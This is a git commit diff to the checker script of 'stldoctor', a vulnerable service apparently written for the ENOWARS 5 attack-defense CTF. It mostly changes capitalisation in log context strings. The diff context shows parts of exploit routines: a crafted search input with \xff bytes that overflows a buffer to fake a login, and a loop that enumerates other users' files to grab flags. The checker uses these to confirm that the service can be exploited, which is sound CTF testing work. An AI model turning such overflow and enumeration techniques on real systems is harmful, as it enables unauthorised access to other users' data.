diff options
| author | Louis Burda <quent.burda@gmail.com> | 2021-07-06 17:43:38 +0200 |
|---|---|---|
| committer | Louis Burda <quent.burda@gmail.com> | 2021-07-06 17:43:38 +0200 |
| commit | af37f8075b0c1225f5e49339565bb6738c4d1f20 (patch) | |
| tree | 98a8075dda62b919881275ad2880328b54d245d9 /checker/src/checker.py | |
| parent | 166b238ace53d6ba5ccdc4a160778379a10b9967 (diff) | |
| download | enowars5-service-stldoctor-af37f8075b0c1225f5e49339565bb6738c4d1f20.tar.gz enowars5-service-stldoctor-af37f8075b0c1225f5e49339565bb6738c4d1f20.zip | |
bump enochecker3 and fix context messages in read calls
Diffstat (limited to 'checker/src/checker.py')
| -rw-r--r-- | checker/src/checker.py | 32 |
1 files changed, 14 insertions, 18 deletions
diff --git a/checker/src/checker.py b/checker/src/checker.py index 846d858..6a05448 100644 --- a/checker/src/checker.py +++ b/checker/src/checker.py @@ -383,7 +383,7 @@ async def do_auth( await session.drain() # Check for errors - resp = await session.readline(ctx="Reading auth response (1)") + resp = await session.readline(ctx="reading auth response (1)") if b"ERR:" in resp: if check: session.logger.critical(f"Failed to login with {authstr!r}:\n{resp!r}") @@ -391,7 +391,7 @@ async def do_auth( return None # Also check success message - resp += await session.readuntil(prompt, ctx="Reading auth response (2)") + resp += await session.readuntil(prompt, ctx="reading auth response (2)") if b"Success!" not in resp: session.logger.critical(f"Login with pass {authstr!r} failed") raise MumbleException("Authentication not working properly") @@ -430,13 +430,13 @@ async def do_upload( # Check for errors # TODO improve by reading responses separately - resp = await session.readline(ctx="Reading upload response (1)") - resp += await session.readline(ctx="Reading upload response (2)") + resp = await session.readline(ctx="reading upload response (1)") + resp += await session.readline(ctx="reading upload response (2)") if b"ERR:" in resp: if check: session.logger.critical(f"Failed to upload model {modelname!r}:\n{resp!r}") raise MumbleException("File upload not working properly") - await session.readuntil(prompt, ctx="Waiting for prompt") + await session.readuntil(prompt, ctx="waiting for prompt") return None # Parse ID @@ -450,7 +450,7 @@ async def do_upload( ) raise MumbleException("File upload not working properly") - await session.readuntil(prompt, ctx="Waiting for prompt") + await session.readuntil(prompt, ctx="waiting for prompt") return modelid @@ -489,13 +489,13 @@ async def do_search( # read until end of info box fileinfo = line + await session.readuntil( - b"================== \n", ctx="Reading stl info" + b"================== \n", ctx="reading stl info" ) stlfile = b"" if download: # Parse file contents - await session.readuntil(b"Here you go.. (", ctx="Reading stl size (1)") - resp = await session.readuntil(b"B)\n", ctx="Reading stl size (2)") + await session.readuntil(b"Here you go.. (", ctx="reading stl size (1)") + resp = await session.readuntil(b"B)\n", ctx="reading stl size (2)") resp = resp[:-3] size = parse_int(resp) if size is None: @@ -504,7 +504,7 @@ async def do_search( ) session.logger.debug(f"Download size: {size}") - stlfile = await session.read(size, ctx="Reading stl contents") + stlfile = await session.read(size, ctx="reading stl contents") await session.readuntil(prompt) return fileinfo, stlfile @@ -1019,18 +1019,15 @@ async def exploit_prefix_truncation(di: DependencyInjector) -> bytes: raise MumbleException("Failed to list files through search") # Use it to enumerate other files and grab contents - session.logger.debug( - "Targets:\n" + "\n".join([" - " + l.decode("latin1") for l in filelist]) - ) flag = None for i, fhash in enumerate(filelist): session.logger.debug(f"Retrieving file {fhash} at index {i}") session.write(f"{i}\nn\n".encode()) await session.drain() filelist_resp = await session.readuntil( - b"==================", ctx="Getting file info (1)" + b"==================", ctx="getting file info (1)" ) - filelist_resp += await session.readuntil(b"? ", ctx="Getting file info (2)") + filelist_resp += await session.readuntil(b"? ", ctx="getting file info (2)") if flag := searcher.search_flag(filelist_resp.decode("latin1")): break @@ -1053,10 +1050,10 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None: session = await di.get(Session) session.write(b"search \xff\xff\xff\xff\xff0000000000000000\n") await session.drain() - await session.readuntil(prompt, ctx="Getting user hashes via search") + await session.readuntil(prompt, ctx="getting user hashes via search") session.write(b"auth\n") await session.drain() - resp = await session.readuntil(prompt, ctx="Checking auth success") + resp = await session.readuntil(prompt, ctx="checking auth success") if b"Already logged in!" not in resp: raise MumbleException("Exploit did not set 'loggedin' variable via overflow") @@ -1064,7 +1061,6 @@ async def exploit_hash_overflow(di: DependencyInjector) -> None: resp = await do_list(session, check=False) if not resp: raise MumbleException("") - session.logger.debug("list response: " + str(resp)) users = [l.split(b" .")[1] for l in resp.split(b"\n") if b">> ." in l] await session.exit() |